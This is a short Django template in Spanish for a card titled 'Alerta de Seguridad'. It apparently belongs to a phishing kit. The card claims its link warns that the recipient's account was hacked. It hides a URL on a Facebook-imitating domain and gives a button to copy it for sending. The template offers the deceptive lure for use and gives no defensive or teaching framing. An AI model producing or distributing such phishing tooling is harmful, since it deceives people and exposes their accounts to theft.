{% load static %}
{% extends 'base.html' %}
        {% block content %}
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

<script>
function copyToClipboard(elemento) {
  var $temp = $("<input>")
  $("body").append($temp);
  $temp.val($(elemento).text()).select();
  document.execCommand("copy");
  $temp.remove();
}

</script>
<div class="card" style="width: 18rem;">
  <img src="{% static 'img/alert.png' %}" class="card-img-top" alt="...">
  <div class="card-body">
    <h5 class="card-title">Alerta de Seguridad</h5>
    <p class="card-text">Este enlace envia una alerta, de que hackearon su cuenta.</p>
    <p class="d-none" id="p1">https://facebook-vkk6.onrender.com/alerta/de/seguridad/</p>
    <a href="#" class="btn btn-primary"  onclick="copyToClipboard('#p1')">Copiar Enlace</a>
  </div>
</div>       
                  {% endblock %}
